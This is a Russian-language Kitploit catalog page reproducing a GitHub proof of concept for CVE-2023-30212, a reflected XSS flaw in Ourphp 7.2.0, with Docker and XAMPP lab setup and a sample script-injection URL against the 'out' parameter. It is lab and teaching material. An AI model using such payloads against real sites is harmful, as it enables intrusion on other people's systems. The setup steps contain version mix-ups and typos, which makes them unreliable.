Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-30212-POC — Доказательство концепции эксплуатации CVE-2023-30212, XSS-уязвимости в Ourphp 7.2.0, включая настройку Docker и демонстрацию полезной нагрузки. | Kitploit
Инструменты/GitHubGitHub/arunsnap/cve-2023-30212-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

Доказательство концепции эксплуатации CVE-2023-30212, XSS-уязвимости в Ourphp 7.2.0, включая настройку Docker и демонстрацию полезной нагрузки.

Репозиторий
113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-30212-POC

Создание уязвимой среды Docker и эксплуатация уязвимости в Ourphp версии 7.2.0 ( CVE 2023 30212 )

Шаг 1. Скачайте и установите Docker в свою систему. Я использую Docker, потому что с ним Ubuntu устанавливается быстро и легко

Шаг 2. Настройка окружения Docker

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

Шаг 3. Установка зависимостей

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

Шаг 4. Установка веб-сервера, PHP и MySQL. Для этого я установлю сервер XAMPP

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

Шаг 5. Скачивание Ourphp версии 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

Шаг 6. Настройка Ourphp в браузере. Откройте браузер и введите localhost или 127.0.0.1. Следуйте инструкциям и установите Ourphp

Шаг 7. Эксплуатация уязвимости. Версия Ourphp 7.2.0 уязвима к XSS (межсайтовому скриптингу). Чтобы устранить уязвимость в файле /client/manage /ourphp_out.php, которая допускает выполнение XSS-кода

вход обнаружение

вам необходимо изменить код. Уязвимость возникает, когда параметр "ourphp_admin" установлен в значение "logout", а управляемой переменной является "out"

результат

Доказательство концепции

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

видео

видео
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

Скачать инструмент